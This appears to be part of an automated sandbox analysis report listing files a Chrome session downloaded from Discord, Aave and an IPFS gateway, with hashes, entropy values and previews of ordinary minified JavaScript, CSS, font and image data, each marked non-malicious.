                                                                                                                                                                                                                                                  SHA-256:FD49D05358A2600970E93B21AC966D26D26FC871EBD530926A3700D6F76EABC4
                                                                                                                                                                                                                                                  SHA-512:3208941D9F0A878A1B8E2DF1FF43098C6A37819C45CEAB48411A0BB708109174AB5CBEFE6BDEA7611F83CB17515FDCD962B1882CA3AC4DDC3F3D2AAB530E2526
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8806],{8403:function(e,s,o){"use strict";o.d(s,{M:function(){return x}});var a=o(59499),n=o(53737),d=o(33740),t=o(62097),c=o(61225),i=o(30120),r=o(81011),m=o(80562),b=o(23279),l=o.n(b),g=o(67294),A=o(85893);function f(e,s){var o=Object.keys(e);if(Object.getOwnPropertySymbols){var a=Object.getOwnPropertySymbols(e);s&&(a=a.filter((function(s){return Object.getOwnPropertyDescriptor(e,s).enumerable}))),o.push.apply(o,a)}return o}var x=function(e){var s=e.onSearchTermChange,o=e.wrapperSx,b=e.placeholder,x=e.disableFocus,h=(0,g.useRef)(null),C=(0,g.useState)(""),D=C[0],F=C[1],E=(0,t.Z)().breakpoints,I=(0,c.Z)(E.down("sm")),p=(0,g.useMemo)((function(){return l()((function(e){s(e)}),300)}),[s]);return(0,A.jsxs)(i.Z,{sx:function(e){return function(e){for(var s=1;s<arguments.length;s++){var o=null!=arguments[s]?arguments[s]:{};s%2?f(Object(o),!0).forEach((function(s){(0,a.Z)(e,s,o[s])})):Object.getOwnPropertyDescriptors?Object.defineProper
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 139388, version 2.459
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):139388
                                                                                                                                                                                                                                                  Entropy (8bit):7.99804629870967
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:3072:Q69dyqPSD49z56qcFxDiYZHYj3pU5qJvdzqC3dZIwv82phTFsZ:yUSD49d6TDiYZ8pU4Jvlnd42vmZ
                                                                                                                                                                                                                                                  MD5:DB985AAA3C64F10506D96D876E350D47
                                                                                                                                                                                                                                                  SHA1:AAD4A93575E59643FED7617E2FEB893DD763D801
                                                                                                                                                                                                                                                  SHA-256:234FEB9A8A2C759D00A4959506A3B9CB94C772186A2D117AED973347C7EF1891
                                                                                                                                                                                                                                                  SHA-512:300D0D35EBB9E27D66489FFB3E5502A4DCD3AF032FB0F672D4F004E3846FB795772B6938C99DAFED6FAD0C25DA8412D6F6A7B0221EB2540E84527703DB5B7073
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/452d7be36bf4b23241bd.woff2
                                                                                                                                                                                                                                                  Preview:wOF2...... |......9... ...........................f...v....`...........e.6.$..T..X.. ..|...[..[.B...c.{....:.w..T.l...C.T+...G.......F.\s...m..J.n`....y..6.<.................c......#............m..n...u..#$H..+....1).oq.l.@...U...#TpP...C..Xk.`.k.....(!...1k0....2f.W^.&hw.hF&h...v.[dA..Y./.6....zC..3._d.....r@...n.$...,.F.6X......SG....x...N.+..6.a%.].V}.u.(P..w.pK..%?.o......b.So1.....M.5.2........).`.N...D.fwTz..a.A. ...).=.\Y..Z.')+.../....0{..8..26u.;<a.......<...=.....eq;kD....Y..I^..`.R..n...T=.R.*.T.Jl.W..p..]..*...5.(y#....P.G.N........$Iv.....~....ns...J....TuY!o..jz...P5|@..H.Tu.P.b!T..r7..,<.u.O....?......J.9...........r....~..f..U`...Y..|....;..K>cl.....`_.+..l....f>.s.#w...36...[...9rI..t@.....b7.s..F....<..x.zT.t.5...8..?..j9k.'-.)u.[..w..>1I.....2.w.;..3.\?.,...b!.B$Qh.......A....?#...O.....5~W.h..HD.....V..d.O..\x1.rLV..U.4~...k.m.U...{6mg...q.ldfc...d..>[.i............<.".w^....4...XJ.n.xm..D.......M....XE.@.....GL...
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (15198), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):15198
                                                                                                                                                                                                                                                  Entropy (8bit):5.475675515582932
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:E7ibegv0VRKGayRI7OzFxE1LWOBEAVyQGQYGbYsieX:E7hlI7Ozcj+QPYGbFX
                                                                                                                                                                                                                                                  MD5:C276816BA15AAC6C0F054FFA7EDD522C
                                                                                                                                                                                                                                                  SHA1:03DD06A3487CAB788E6EEA217246098116F9A316
                                                                                                                                                                                                                                                  SHA-256:C868EE2AEFAF99D69FFF9907D39957BF18DA5E6806090B391C7E0A2C50CBCC36
                                                                                                                                                                                                                                                  SHA-512:55EE595DD9DE301B44F4A4C02521A84A7983C26CFAB69899F01CB79AEBBDFF9FA8F4285EECBECD34893B367335B5E0DD06A343A9061EA97A51D202E4FCBF0897
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/6504.d2701b5d1c9eba02.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6504],{89722:function(e,t,r){r.d(t,{Z:function(){return b}});var n=r(87462),o=r(63366),i=r(67294),a=r(86010),s=r(94780),l=r(81719),c=r(78884),u=r(36622),d=r(34867);function m(e){return(0,d.Z)("MuiIcon",e)}(0,r(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var p=r(85893);const f=["baseClassName","className","color","component","fontSize"],v=(0,l.ZP)("span",{name:"MuiIcon",slot:"Root",overridesResolver:(e,t)=>{const{ownerState:r}=e;return[t.root,"inherit"!==r.color&&t[`color${(0,u.Z)(r.color)}`],t[`fontSize${(0,u.Z)(r.fontSize)}`]]}})((({theme:e,ownerState:t})=>({userSelect:"none",width:"1em",height:"1em",overflow:"hidden",display:"inline-block",textAlign:"center",flexShrink:0,fontSize:{inherit:"inherit",small:e.typography.pxToRem(20),medium:e.typography.pxToRem(24),large:e.typography.pxToRem(36)
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (12936), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):12936
                                                                                                                                                                                                                                                  Entropy (8bit):5.553604676962967
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:xyPmhrU+P+QdVeiHXerPdZ5w3UsN1bh1pUMJwfN/zH:xyPsU+WuVecXW3JsvZUTfVzH
                                                                                                                                                                                                                                                  MD5:E10EC769BF7DE9EFFD288CE92B44858A
                                                                                                                                                                                                                                                  SHA1:23ED148516A9FD7A121A2BBB3B24A9FCC4348D97
                                                                                                                                                                                                                                                  SHA-256:6E6F366895D3E4D6D7134AD68E405FE0595003D02B5CF6A751BAD2692A972284
                                                                                                                                                                                                                                                  SHA-512:C49C1FC6433A23EC3782649FF44B7167512DAFA702D8704B3A4C8E4C5ED81F7D79A267185B0DF8EC2013B602A62EC18F6414E3E80C73EC2808F2042DB1BC668E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/8701.d52e3ab5e2f5c410.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8701],{62753:function(e,t,r){var n=r(64836);t.Z=void 0;var o=n(r(64938)),s=r(85893),i=(0,o.default)((0,s.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=i},9144:function(e,t,r){var n=r(63366),o=r(87462),s=r(67294),i=r(95408),a=r(98700),c=r(39707),l=r(59766),d=r(81719),u=r(78884),p=r(85893);const x=["component","direction","spacing","divider","children"];function m(e,t){const r=s.Children.toArray(e).filter(Boolean);return r.reduce(((e,n,o)=>(e.push(n),o<r.length-1&&e.push(s.cloneElement(t,{key:`separator-${o}`})),e)),[])}const f=(0,d.ZP)("div",{name:"MuiStack",slot:"Root",
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (11915), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):11915
                                                                                                                                                                                                                                                  Entropy (8bit):5.350458456377442
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:tOwLI0HaEnGUgXY/s3pCXI5Uaxd+CH0eO+dXq8rFI995W3ax:A30FHsY0pMIWLs0eOYq8rY95yI
                                                                                                                                                                                                                                                  MD5:0B24C625578C26E207A37085A2E36E17
                                                                                                                                                                                                                                                  SHA1:B034EC41B67A8411B84329346689900B58FFD157
                                                                                                                                                                                                                                                  SHA-256:074EB364CF5F95FCE6C2B93B53E6E86637E90C2BC98FEEF126514E0340CEFE2E
                                                                                                                                                                                                                                                  SHA-512:FDE7659612DA1B403E6373934886E1A198E99A472A0B7AC29D6DC9A38724AB88826D0A85047CC776D384DF9A390F458B59803E3B138C3B8BC4CC615ED791B8F7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/1320.f9a83bb87b7294af.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1320],{96875:function(e,n,r){r.d(n,{o:function(){return m}});var t=r(59499),i=r(4730),o=r(49501),c=r(1279),s=r(62097),a=r(30120),l=r(29630),d=r(75084),x=r(70794),u=r(41024),p=r(85893),j=["value","onInfoClick","HALIntegrationComponent"];function f(e,n){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var t=Object.getOwnPropertySymbols(e);n&&(t=t.filter((function(n){return Object.getOwnPropertyDescriptor(e,n).enumerable}))),r.push.apply(r,t)}return r}function h(e){for(var n=1;n<arguments.length;n++){var r=null!=arguments[n]?arguments[n]:{};n%2?f(Object(r),!0).forEach((function(n){(0,t.Z)(e,n,r[n])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):f(Object(r)).forEach((function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}))}return e}var m=function(e){var n=e.value,r=e.onInfoClick,t=e.HALIntegrationComponent,f=(0,i.Z)(e,j),m=(0,s.Z)().palette,v=
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (9876), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):9876
                                                                                                                                                                                                                                                  Entropy (8bit):5.284716799878069
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:h9bEDHZT0TA7l6D2Kt0RwzGwsV8oXiTRIvu664:WAQ
                                                                                                                                                                                                                                                  MD5:009EAE380D18E68D02FD3B1EFE0B3979
                                                                                                                                                                                                                                                  SHA1:F16F04E668DE6B1960B8E060A897AAAD24B7DC69
                                                                                                                                                                                                                                                  SHA-256:3B970DE2228A8DFAD7880CCA281E91DB8DB698E103B8925638915287AEF6032F
                                                                                                                                                                                                                                                  SHA-512:A8C53DBAEC8788C3AA137A75E43E5119708617574CE641FA88BC0B54AE745D3BD414BBF29D4203DA8623BDCEFCA2C8EAF8F83E17091F66F36B38D8B559EE0DE2
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/3629-beffcb1d37e29d12.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3629],{43629:function(e,r,t){t.d(r,{hv:function(){return W},rM:function(){return J},wD:function(){return K},ov:function(){return H}});var n=t(59499),o=t(4730),i=t(1279),c=t(67294),s=t(49501),a=t(58771),p=t(30120),l=t(68861),u=t(58527),b=t(85893),d=["borrowCap"];function f(e,r){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);r&&(n=n.filter((function(r){return Object.getOwnPropertyDescriptor(e,r).enumerable}))),t.push.apply(t,n)}return t}function y(e){for(var r=1;r<arguments.length;r++){var t=null!=arguments[r]?arguments[r]:{};r%2?f(Object(t),!0).forEach((function(r){(0,n.Z)(e,r,t[r])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(t)):f(Object(t)).forEach((function(r){Object.defineProperty(e,r,Object.getOwnPropertyDescriptor(t,r))}))}return e}var j=function(e){var r=e.borrowCap,t=(0,o.Z)(e,d);return r&&r.isMaxed?(0,b.jsx)(p.Z,{s
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1956
                                                                                                                                                                                                                                                  Entropy (8bit):7.26159273591798
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:0Mhu18+/bwHXdbyD3xm5vYs2W2PjDCjSFq:Rs1hMHNbGA5AsyCuFq
                                                                                                                                                                                                                                                  MD5:D0A3E0C4B340CE843FE788ED6BF16947
                                                                                                                                                                                                                                                  SHA1:6661FED613E61C9D918256C23A6622CF26BAA8A2
                                                                                                                                                                                                                                                  SHA-256:BCEE214086F13292DFE8E6B17AF55D7AA977830C2C7F45A1905FE9A1FC359022
                                                                                                                                                                                                                                                  SHA-512:41BECA98A90AD9B69C611A345FDA710158DE18DA68BBFD1F3F2D905D98E885B8884F1DDA2C87CA2BFB6662A6998DB3490136B29D7B4FE20EFA8DB5B3D778BF22
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8X....0...?..?..ICCP........appl....mntrRGB XYZ ............acspAPPL....APPL...........................-appl....8.G.m..Oz../................................desc.......0cprt...,...Pwtpt...|....rXYZ........gXYZ........bXYZ........rTRC....... chad.......,bTRC....... gTRC....... mluc............enUS.........D.i.s.p.l.a.y. .P.3mluc............enUS...4.....C.o.p.y.r.i.g.h.t. .A.p.p.l.e. .I.n.c...,. .2.0.2.2XYZ ...............,XYZ ..........=.....XYZ ......J....7....XYZ ......(8.......para..........ff......Y.......[sf32.......B.......&.......................nALPHc.....b....T.).f.....Of._8..Ge.Y(...OJ.g....."..$I2..<....h.a.......m..$....7...]).b..E r..l.>..=[..=+....E..W..~.1,.i.U.j.T..Y.,....k.V..hX..........^..x.C.....2...{.....a......aW0....3..%..jLTc..&,#........hT.F.h......1x.'.G.4.F.*4%~....4b...M.{....D.$.g|7I...Sr..;...9..(E....[.......[V.I.....u"q;".=.....]oU..7o...>...c..$j..m...`......VP8 ....p....*@.@.>a&.E."!....@....b...../.g..{...Ao9...@....
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (15744), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):15744
                                                                                                                                                                                                                                                  Entropy (8bit):5.248482024601397
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:eWdEOWhlahl+PSaq3qAdzTpw5Ur664iCCw79AyIxLsu9qWZkuJsb6:MbS733pTqjPiCC69mLeW
                                                                                                                                                                                                                                                  MD5:33A79C9556F37933B9CB90566F1D1AD1
                                                                                                                                                                                                                                                  SHA1:8020F6502557AFC541179470FFD04E3FBEB7D0B0
                                                                                                                                                                                                                                                  SHA-256:15276E68799F7F3BAF8CDB0E61517941ED276E81DEDF0D4F5FB4A31F8549D004
                                                                                                                                                                                                                                                  SHA-512:A5981F6B139D05D14B2C73B8B01B635BCE2A2DED7CE212CAE78A22D0192299468DDF3CB20055FAF8BEA4311BB3D13242ECDCCE4AD6B744FB71CC28A2A849A9C2
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/7603.58cb27010e0a12d8.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7603],{57333:function(t,e,r){var o=r(67294);function n(){}function a(t){return!!(t||"").match(/\d/)}function i(t){return null===t||void 0===t}function s(t){return t.replace(/[-[\]/{}()*+?.\\^$|]/g,"\\$&")}function u(t,e){void 0===e&&(e=!0);var r="-"===t[0],o=r&&e,n=(t=t.replace("-","")).split(".");return{beforeDecimal:n[0],afterDecimal:n[1]||"",hasNagation:r,addNegation:o}}function l(t,e,r){for(var o="",n=r?"0":"",a=0;a<=e-1;a++)o+=t[a]||n;return o}function p(t,e){return Array(e+1).join(t)}function c(t,e){if(t.value=t.value,null!==t){if(t.createTextRange){var r=t.createTextRange();return r.move("character",e),r.select(),!0}return t.selectionStart||0===t.selectionStart?(t.focus(),t.setSelectionRange(e,e),!0):(t.focus(),!1)}}function f(t,e,r){return Math.min(Math.max(t,e),r)}function h(t){return Math.max(t.selectionStart,t.selectionEnd)}var m={displayType:"input",decimalSeparator:".",thousandsGroupStyle:"thousand",fixe
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1864710
                                                                                                                                                                                                                                                  Entropy (8bit):5.55161545080784
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:49152:fpyxnfdD9MWgEWGYUIS69i0D2xzE8zSp13CUnsk9CaEwloUxg8UIc9w:NsGN
                                                                                                                                                                                                                                                  MD5:9FD79FFB450982E6F77F2D0E60DB21BF
                                                                                                                                                                                                                                                  SHA1:E3DE3454A879029A09DF5A42AB06ECADC8ABB384
                                                                                                                                                                                                                                                  SHA-256:AC92A1C7CBE14F23D5CAFCBC887979F89F1C7F3817078B35791F8A4E31DDF9F2
                                                                                                                                                                                                                                                  SHA-512:A90AAD7B7729B9F23A1B74054FCC9DC260F78D5E8EDD232DB77C1C95E2004E897770F4074D67B670E3C4CBCBB18E5AB690651C549DAC220E2FFE17D778FC3044
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2888],{20846:function(e,t,n){"use strict";n.d(t,{W:function(){return s}});var r=n(64146),a=n(8198);const i=[{inputs:[{internalType:"address",name:"stkAave",type:"address"},{internalType:"address",name:"ethUsdPriceFeed",type:"address"},{internalType:"address",name:"aaveUsdPriceFeed",type:"address"}],stateMutability:"nonpayable",type:"constructor"},{inputs:[],name:"AAVE_USD_PRICE_FEED",outputs:[{internalType:"address",name:"",type:"address"}],stateMutability:"view",type:"function"},{inputs:[],name:"ETH_USD_PRICE_FEED",outputs:[{internalType:"address",name:"",type:"address"}],stateMutability:"view",type:"function"},{inputs:[],name:"STAKED_AAVE",outputs:[{internalType:"address",name:"",type:"address"}],stateMutability:"view",type:"function"},{inputs:[{internalType:"address",name:"stakedAsset",type:"address"},{internalType:"address",name:"oracle",type:"address"}],name:"getStakedAssetData",outputs:[{components:[{internalType:"uint256",
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (18413)
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):18462
                                                                                                                                                                                                                                                  Entropy (8bit):5.315468160706795
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:tOQ0mtG04pG+rx1soKoLItuPVMWpUdq3FYbNbeka5xeWoY/La0WMTUbbbutFY/Gg:tOPmtGTGGDsoRstuKFNCQ/ORQ3
                                                                                                                                                                                                                                                  MD5:8512E88B19ECA216651CF98758081B2F
                                                                                                                                                                                                                                                  SHA1:7B2068A3745C79A04BC5EEFDC8502DBF1248DC43
                                                                                                                                                                                                                                                  SHA-256:777062C855794DC39AD7C1100C51D812470B6D4D8691F3AD3602733FB6C63AD0
                                                                                                                                                                                                                                                  SHA-512:958CA401AF7A1192640E094BA5F3733AA5B2D6FC46EA6AE398779C4F858BEFD5F2F059C4BC4B5438D10CA66F33D9CAD139E78021A2328B7930AD3057DA546406
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["20011"],{482682:function(t){t.exports="/assets/ebb5b41de823fbc19d12.png"},450125:function(t){t.exports="/assets/1e4932a7afbb1fcdba2d.png"},733949:function(t){t.exports="/assets/e1ce6b38901837435ec5.png"},877604:function(t,i,e){e(411104);var s,n=e(735250),h=e(470079),a=e(120356),r=e.n(a),l=e(111543);function o(t,i,e){return i in t?Object.defineProperty(t,i,{value:e,enumerable:!0,configurable:!0,writable:!0}):t[i]=e,t}let d=t=>new Promise((i,e)=>{null==t&&e(Error("No image src passed"));let s=new Image;s.src=t,s.onload=()=>i(s),s.onerror=t=>e(t)});class u extends(s=h.PureComponent){componentDidUpdate(t){t.src!==this.props.src&&this.setState({loaded:!1},()=>this.initialize())}initialize(){d(this.props.src).then(()=>{!this.unmounting&&this.setState({loaded:!0})})}componentWillUnmount(){this.unmounting=!0}render(){let{className:t,src:i,alt:e,width:s,height:h,onLoad:a,style:o,imageClassName:d}=this.props,{lo
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (10134), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):10134
                                                                                                                                                                                                                                                  Entropy (8bit):5.3248676773482275
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:w7g8F82kZbk9/obvQw++1R5j3FvtWU/98iqcjJLmLLx5pOsYU3hJo:w7GbbkxyzLR3FvN/6ojJGbYsL4
                                                                                                                                                                                                                                                  MD5:294B8F234E5006980C29F7309DF45D75
                                                                                                                                                                                                                                                  SHA1:FE4B0BE3402F3F26499D388F52F9FBD041D18D06
                                                                                                                                                                                                                                                  SHA-256:BA9F3DFF2E49BAF1CB2BAEB27C495A08630C569B3B0C1BD71DAE366574C2E37C
                                                                                                                                                                                                                                                  SHA-512:B071E5FC210E35015E3C86AA10FD547C2797425F0C0B54E7810CE934C9F14A7A0820E4E8EFA5BBFCA5C77B6B0CF0DE664DA3852C7FC623E5FD80B202BE9577FD
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[82],{833:function(e,t,r){r.r(t),r.d(t,{BigNumber:function(){return n.O$},formatFixed:function(){return o.S5},FixedFormat:function(){return o.xO},FixedNumber:function(){return o.xs},parseFixed:function(){return o.Ox},_base16To36:function(){return n.t2},_base36To16:function(){return n.g$}});var n=r(2593),o=r(20335)},78435:function(e,t,r){r.r(t),r.d(t,{logger:function(){return n.k},Wordlist:function(){return n.D},wordlists:function(){return o.E}});var n=r(48812),o=r(10234)},89722:function(e,t,r){r.d(t,{Z:function(){return h}});var n=r(87462),o=r(63366),i=r(67294),s=r(86010),a=r(94780),c=r(81719),l=r(78884),u=r(36622),d=r(34867);function f(e){return(0,d.Z)("MuiIcon",e)}(0,r(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var p=r(85893);const m=["baseClassName","className","color","component","fontSiz
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):1228071
                                                                                                                                                                                                                                                  Entropy (8bit):5.220638577241628
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:pA3TRoVJheQ8KevkJHfDsOrtTzWyZTQ02JKdmGKOIGVmtPwWCt3klbhtyUXQ327G:pA3TqVX8KevkJHfDsOrtTzWyZTQ02JKD
                                                                                                                                                                                                                                                  MD5:D079833787063B390372213FECC21357
                                                                                                                                                                                                                                                  SHA1:8825772A352361D91E46E0DB501657FD8BF4A2DA
                                                                                                                                                                                                                                                  SHA-256:0E47D30A479D70930DD22C8E1090C1823EA69F2C37CB1C6BECAE36394724F235
                                                                                                                                                                                                                                                  SHA-512:E6CC5437F90B7C3F46B65667C6FD406DCE5DF670A2FFFAE5859D2FE2C9101A30D24A22E1FA32A7D9B205EAC846FFA9CE02A67DF5C795F6339DFBE22BE8196DD2
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/69646.560b06bc5c21054b4473.css
                                                                                                                                                                                                                                                  Preview:@keyframes spinner-wandering-cubes_b6db20{25%{transform:translatex(22px)rotate(-90deg)scale(.5)}50%{transform:translatex(22px)translatey(22px)rotate(-180deg)}75%{transform:translatex(0)translatey(22px)rotate(-270deg)scale(.5)}to{transform:rotate(-360deg)}}@keyframes spinner-chasing-dots-rotate_b6db20{to{transform:rotate(360deg)}}@keyframes spinner-chasing-dots-bounce_b6db20{0%,to{transform:scale(0)}50%{transform:scale(1)}}@keyframes spinner-pulsing-ellipsis_b6db20{0%{transform:scale(1);opacity:1}50%{transform:scale(.8);opacity:.3}to{transform:scale(1);opacity:1}}@keyframes spinner-low-motion_b6db20{0%{opacity:1}50%{opacity:.6}to{opacity:1}}@keyframes spinner-spinning-circle-rotate_b6db20{to{transform:rotate(360deg)}}@keyframes spinner-spinning-circle-dash_b6db20{0%{stroke-dasharray:1,200;stroke-dashoffset:0}50%{stroke-dasharray:130,200}to{stroke-dasharray:130,200;stroke-dashoffset:-124}}.spinner_b6db20{display:flex;justify-content:center;align-items:center}.inner_b6db20{position:relati
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (27868), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):27868
                                                                                                                                                                                                                                                  Entropy (8bit):5.4866264097941295
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:yyPyWVecfOYV3HFQ/AomIkhCsePNb5TrgbFPB:ReTO2tkhCbNK
                                                                                                                                                                                                                                                  MD5:18837DE2BB5281AD931EC916147321DF
                                                                                                                                                                                                                                                  SHA1:D5CFF8DA53DE054E81B4785FDC683378EB099125
                                                                                                                                                                                                                                                  SHA-256:D132602004CD9FDFD5C08830FD3C506EC1FEBEB503651F042EF9F73518C54704
                                                                                                                                                                                                                                                  SHA-512:786C20EDD8B59BD32BF9FB7F96EDB063FD8AC9522997F908068B0E5AEC34BD81B8B43326E740EA5B9CF101B8BEF2026E8E965B1F3C8F3F3D5DC1581A5B25E906
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
